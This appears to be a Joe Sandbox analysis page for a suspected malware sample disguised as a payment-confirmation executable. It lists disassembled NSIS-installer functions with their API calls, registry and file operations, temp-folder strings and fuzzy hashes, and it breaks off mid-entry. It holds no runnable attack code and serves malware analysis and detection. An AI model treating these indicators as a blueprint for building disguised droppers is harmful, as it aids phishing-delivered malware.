Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp$C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Call
API String ID: 1941528284-1096927483
Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1

Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406269

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
wsprintfW.USER32 ref: 00406A58
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C

Strings

%s%S.dll, xrefs: 00406A52
UXTHEME, xrefs: 00406A0F

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

Function 6E311817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E311BFF: GlobalFree.KERNEL32(?), ref: 6E311E74
Part of subcall function 6E311BFF: GlobalFree.KERNEL32(?), ref: 6E311E79
Part of subcall function 6E311BFF: GlobalFree.KERNEL32(?), ref: 6E311E7E

GlobalFree.KERNEL32(00000000), ref: 6E3118C5
FreeLibrary.KERNEL32(?), ref: 6E31194B
GlobalFree.KERNEL32(00000000), ref: 6E311970

Part of subcall function 6E31243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E31246F

Part of subcall function 6E312810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E311896,00000000), ref: 6E3128E0

Part of subcall function 6E311666: wsprintfW.USER32 ref: 6E311694

Strings

, xrefs: 6E311951

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 3de06827cb93674feaf094ec281f14f5afb11c30bd8f1cfaf8118e927b0f2163
Instruction ID: a84d86314f184f656fde97c6d77db51d01d5e39f30a19534e74a60fb17059266
Opcode Fuzzy Hash: 3de06827cb93674feaf094ec281f14f5afb11c30bd8f1cfaf8118e927b0f2163
Instruction Fuzzy Hash: F641D87140C2069BDF489FF4D984BD537ACAF16358F1488ADED959B08ADBB5C18CC7A0

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
API String ID: 2655323295-1847755183
Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004061BF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004061A6
nsa, xrefs: 004061AE

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
API String ID: 1892508949-3948318427
Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E

Function 004071D5 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45

Function 004073D6 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45

Function 004070EC Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45

Function 0040703F Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45

Function 0040715D Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
